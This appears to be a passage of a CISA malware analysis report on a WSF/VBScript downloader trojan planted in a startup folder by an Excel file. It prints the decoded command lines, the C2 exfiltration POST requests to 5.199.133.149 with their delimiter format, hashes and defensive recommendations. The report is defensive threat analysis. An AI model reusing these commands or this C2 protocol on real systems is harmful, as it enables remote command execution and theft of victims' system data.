This artifact is a wsf file installed by ZaibCb15Ak.xls (4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c). This file is installed into the current user startup folder to run automatically at startup. The file contains hex-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

"vqFIPLLYRjbxR8Km3m9p1ACzyK4Zps20.run PprJwVD1jVboW9s2WjL9uCH1Jk02tisB,0,TRUE"

"cmd.exe /c cscript.exe %LocalAppData%\\Outlook.wsf humpback__whale"

--End strings--



It executes the command below to run the wsf file "%LocalAppData%\Outlook.wsf (d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0) with the argument "humpback__whale".



Displayed below is the command:



--Begin command--

"cmd.exe /c cscript.exe %LocalAppData%\\Outlook.wsf humpback__whale"

--End command--

Screenshots

Figure 20 - The contents of the VBscript.

d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0

Tags

downloaderloadertrojan

Details
Name Outlook.wsf
Size 40674 bytes
Type HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 cb84c6b5816504c993c33360aeec4705
SHA1 9f212961d1de465c20e84f3c4d8ac0302e02ce37
SHA256 d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
SHA512 fec12d5871544bf1d3038baa2c209ceb4b8c8c852b60a222d2e0486b15593cecd26e130bdadcf0927e5f556cca42d3a0bb764fcc00b685a0e464531d36a7c156
ssdeep 768:Wqy5Dr1BE9cmvcmPcvmzm/mAm6zYAr8LBFMwEVxLa3knrjrSK0rvdRz0nq8Fj:Vy5zE9V1cnHCkn3+vdRz0nqG
Entropy 4.028422
Path %LocalAppData%\Outlook.wsf
Antivirus
Avira VBS/Dldr.Agent.LE
IKARUS VBS.Trojan-Downloader.Agent
NANOAV Trojan.Script.Vbs-heuristic.druvzi
Quick Heal VBS.Downloader.45256
Sophos Troj/HTA-AB
Symantec VBS.Downloader.Trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
d77e268b74... Contained_Within 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
d77e268b74... Connected_To 5.199.133.149
Description

This artifact is a wsf file installed by ZaibCb15Ak.xls (4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c)

and executed by Outlook.wsf (ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418) . This file and "Outlook.wsf (f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0) have similar code functions. The file contains hex-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

{impersonationLevel=impersonate}!\\\\

%AppData%\\Local\\Temp\\stari.txt

stari.txt

jznkmustntblvmdvgcwbvqb

oeajgyxyxclqmfqayv

http[:]//5[.]199[.]133[.]149/

POST

cmd.exe /c

>> %temp%\\stari.txt

Select * from Win32_IP4RouteTable

"%COMPUTERNAME%"

"%USERNAME%"

E442779124B3E37D2A3F77D77B66A.Open jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d,KVj42Vxufd0LRBFfZDVj3wRxJ5CX9vOX,False

E442779124B3E37D2A3F77D77B66A.send jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d

--End strings--



It collects the victim's system IP address, computer name, and username in the format below:



--Begin information--

Format: [victim's system Internet Protocol address]|!)!)!|[Computer name]/Username

Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01"

--End information--



The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//5[.]199[.]133[.]149/jznkmustntblvmdvgcwbvqb" and wait for a response.



Displayed below is the POST request used to exfiltrate the victim's system data:



--Begin request--

POST /jznkmustntblvmdvgcwbvqb HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 93

Host: 5[.]199[.]133[.]149



vl=6793263635E4329334937215349F743442D53463ED3....7CC2212199221C5494228E4F70322D38562E3E6212713

--End request---



The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex-encoded and reshuffled. It uses the same built in algorithm to arrange and hex decode these payloads, which contain command-line scripts. The malware will search for the string "|!)!)!|" or "/!&^^&!/" in the decoded payload. If the payload contains one of these strings, it will parse the command-line scripts for execution using the command below:



--Begin command--

"cmd.exe /c [decoded command scripts]| >> %temp%\\stari.txt"

--End command--



The output of the command-line scripts executed is stored into a text file "%temp%\stari.txt". It reads the output of the command executed from the text file "%temp%\stari.txt" and attaches it to the victim's system IP address, computer name, and username in the format below:



--Begin format--

Format: "[victim's system Internet Protocol address]|!)!)!|[Computer name]/Username|!)!)!|[Output of the command executed]"



Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"

--End format--



The above victim's system information and the output command executed are hex-encoded, and the hex bytes are re-ordered and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv" and wait for a response (next command).



Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:



--Begin request--

POST /oeajgyxyxclqmfqayv HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 93

Host: 5[.]199[.]133[.]149



vl=[re-ordered hex-encoded victim's system data and the output of the command executed]

--End request---



Displayed below is sample POST request that contains the encoded victim's system data and the output of the command executed:



--Begin request--

POST /oeajgyxyxclqmfqayv HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 5689

Host: 5[.]199[.]133[.]149



vl=A093273633E2339332927212329A723242D6E6D346365E7226F246E76227271E265674D6469267477C024204601063744215623203A2E202222279426216621227E272052222220296E226262EE60400253446D462D44260577314D223435023231473A36633635F6363270303E6237320E36206220200A20200622222420254226220E277022607260664E0262622E60702762560422202200322222740672742E644C265242C0425E2221722E62705272603A4020542422802228422026422424022322402D2E3223225E20200660602A7268D767776040216727020C2231422D2671726F066777692050634720DA626026606623722F0262662360692262650022262600023E62700060622460632664660F666E6260425E372002262220202E22222209222522232220222F5322222D647E2772571B626F266C472922203302022033782744368C46347730376E4030023232204D2E4235323A254063323379364643463325313062267410766E6660262E627042626220236E2262620E52002206002A62603762763F422947262799202026202625252E0224225E207056776000277C7670664F564C0446736040246622020E32302230222022260322232420272622230A2225232026206475F5706605247502746090664967232464062557626260706E6267720E2630722D32406631A33633683E3042376308366526693664363D6266256523256226273B222032242200706E3260622E263022544335666263606365676DD24624652F0577272644667162656260765EE234324E3330223563093661636A33796235403262203433273034513230223E3240362E3226227E292072272300262563292323222052222420207026627604624524307220422E0222022E706022223200222032202241262202666265606052226202657152707224636A02636433707547252740040E6244227E262002262220292E6326235226266220236E26260022622E6D62046046D65240264D276E270052364260333E6232328536326634306D3734963236243134273227302223262527252223D6222624232E20227040637D266142336264326472206D5E3222225E036022656240627D564422046473267256E4646D4261645F62751726666D69756656262022232524262922201222202A2120262227C92229262E222E6260527262206A7E224322AE2400662436082220C572634061707526569446226260666E666406772060606067666601626146202763060E0206326E606022726200624022606222627402226251606A72606443522526626644665E6276622E7060626622F0666E2372565307005272674F203E66272701272F722D26226264A262622E2A60226277ED727A376E666C6664E77377302E21660307.........EC2C602658246E29E3302A60EE602E600E422E50E5206E6E7E607E209E0E0E202E703E6E052D2E6EE07E232F0E20702E4A2D2E2DAE2E29240A22252E99265D2F0320602900234705142E5F477A2F2C6106612927EC2622250E244D2F8F230420F2397E6CEC225648F56E59609C61706199604C4410625E607022202856253E521D013

--End request---



It is designed to send these messages below to the C2 server using the URI: "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv". Each message sent is hex-encoded, and the hex bytes are re-ordered and appended to a string "vl":



--Begin message format--

"200/!&^^&!/19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01" ==> When the decoded C2 command data received contains the string "|!)!)!|" or "/!&^^&!/".

"19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|sory" ==> When a command or a specific task fails

--End message format--

Screenshots

Figure 21 - The contents of the VBscript.

5.199.133.149

Tags

command-and-control

Ports
  • 80 TCP
HTTP Sessions
  • POST /jznkmustntblvmdvgcwbvqb HTTP/1.1

    Connection: Keep-Alive

    Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

    Accept: */*

    Accept-Language: en-us

    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

    CharSet: UTF-8

    Content-Length: 93

    Host: 5.199.133.149
  • POST /oeajgyxyxclqmfqayv HTTP/1.1

    Connection: Keep-Alive

    Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

    Accept: */*

    Accept-Language: en-us

    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

    CharSet: UTF-8

    Content-Length: 93

    Host: 5[.]199[.]133[.]149
Whois

Domain Name: SERVDISCOUNT-CUSTOMER.COM

Registry Domain ID: 1882350046_DOMAIN_COM-VRSN

Registrar WHOIS Server: whois.psi-usa.info

Registrar URL: http://www.psi-usa.info

Updated Date: 2021-10-28T07:05:37Z

Creation Date: 2014-10-27T07:58:37Z

Registry Expiry Date: 2022-10-27T07:58:37Z

Registrar: PSI-USA, Inc. dba Domain Robot

Registrar IANA ID: 151

Registrar Abuse Contact Email: domain-abuse@psi-usa.info

Registrar Abuse Contact Phone: +49.94159559482

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Name Server: NS1.NTDNS.DE

Name Server: NS2.NTDNS.DE

Name Server: NS3.NTDNS.DE

DNSSEC: unsigned

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

>>> Last update of whois database: 2022-01-31T07:23:45Z <<<

Relationships
5.199.133.149 Connected_From d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
Description

The malware C2 IP address.

Relationship Summary

12db8bcee0... Related_To 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
2471a039cb... Related_To ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
2471a039cb... Related_To 12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa
ce9bd1acf3... Related_To 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
ce9bd1acf3... Connected_To 185.183.96.7
185.183.96.7 Connected_From ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
b6133e04a0... Connected_To 185.117.75.34
185.117.75.34 Connected_From e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca
185.117.75.34 Connected_From b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a
192.210.191.188 Connected_From 5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f
5bcdd42208... Connected_To 192.210.191.188
255e53af8b... Connected_To 185.183.96.44
185.183.96.44 Connected_From 255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a
e7f6c7b91c... Connected_To 185.117.75.34
b1e30cce6d... Connected_To 185.118.164.21
185.118.164.21 Connected_From b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c
185.118.164.21 Connected_From 42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986
42ca7d3fcd... Connected_To 185.118.164.21
026868713d... Dropped c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
026868713d... Dropped f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
c2badcdfa9... Dropped_By 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
f10471e15c... Dropped_By 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
f10471e15c... Connected_To 88.119.170.124
88.119.170.124 Connected_From f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
4b2862a166... Contains d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
4b2862a166... Contains ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
ed988768f5... Contained_Within 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
d77e268b74... Contained_Within 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
d77e268b74... Connected_To 5.199.133.149
5.199.133.149 Connected_From d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

February 24, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.